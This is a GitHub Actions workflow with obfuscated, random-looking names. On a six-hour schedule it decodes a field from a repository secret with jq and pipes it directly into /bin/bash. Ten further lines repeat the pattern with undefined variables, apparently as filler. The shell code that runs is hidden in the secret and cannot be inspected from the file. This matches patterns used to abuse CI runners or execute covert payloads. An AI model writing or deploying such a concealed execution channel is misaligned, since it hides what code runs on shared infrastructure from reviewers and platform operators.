name: huiqianhq
on:
  workflow_dispatch:
  schedule:
    - cron: '55 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huiqianhq
        env:
          fdlgw91302: ${{ secrets.fdlgw91302 }}
        run: |
          echo $fdlgw91302 | jq -r .yvsd15344 | /bin/bash
          echo $pys47991 | jq -r .ogc93 | /bin/bash
          echo $btuzw6 | jq -r .a73 | /bin/bash
          echo $bow6420 | jq -r .fgg9826 | /bin/bash
          echo $fc97 | jq -r .mm0291 | /bin/bash
          echo $odwp39 | jq -r .a5742 | /bin/bash
          echo $gnbr444 | jq -r .bu33 | /bin/bash
          echo $w5 | jq -r .wlw860 | /bin/bash
          echo $yl77 | jq -r .vafdm1557 | /bin/bash
          echo $tj6109 | jq -r .h6669 | /bin/bash
          echo $sdi38 | jq -r .afm94322 | /bin/bash

